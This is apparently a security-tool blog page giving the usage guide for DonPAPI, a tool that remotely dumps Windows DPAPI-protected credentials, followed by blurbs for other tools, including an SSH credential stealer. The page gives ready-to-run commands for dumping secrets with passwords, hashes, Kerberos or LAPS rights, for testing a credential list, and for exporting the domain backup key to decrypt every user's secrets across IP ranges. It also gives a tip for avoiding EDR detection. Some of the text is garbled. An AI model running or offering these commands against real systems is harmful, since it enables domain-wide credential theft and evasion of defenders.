DonPAPI is a Dumping DPAPI Credz Remotely.
DPAPI Dumping
Lots of credentials are protected by DPAPI.
We aim at locating those “secured” credentials, and retreive them using :
TaskScheduled
blob)With local admin account on a host, we can :
With a user password, or the domain PVK we can unprotect the user’s DPAPI secrets.
Dump all secrets of the target machine with an admin account :
DonPAPI.py domain/user:passw0rd@target
Using user’s hash
DonPAPI.py –hashes : domain/user@target
Using kerberos (-k) and local auth (-local_auth)
DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target
Using a user with LAPS password reading rights
DonPAPI.py -laps domain/user:passw0rd@target
It is also possible to provide the tool with a list of credentials that will be tested on the target. DonPAPI will try to use them to decipher masterkeys.
This credential file must have the following syntax:
user1:pass1
user2:pass2
…
DonPAPI.py -credz credz_file.txt domain/user:passw0rd@target
When a domain admin user is available, it is possible to dump the domain backup key using impacket dpapi.py
tool.
dpapi.py backupkey –export
This backup key can then be used to dump all domain user’s secrets!
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
Target can be an IP, IP range, CIDR, file containing list targets (one per line)
The RemoteOps part can be spoted by some EDR. It can be disabled using --no_remoteops
flag, but then the machine DPAPI key won’t be retrieved, and scheduled task credentials/Wi-Fi passwords won’t be harvested.
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…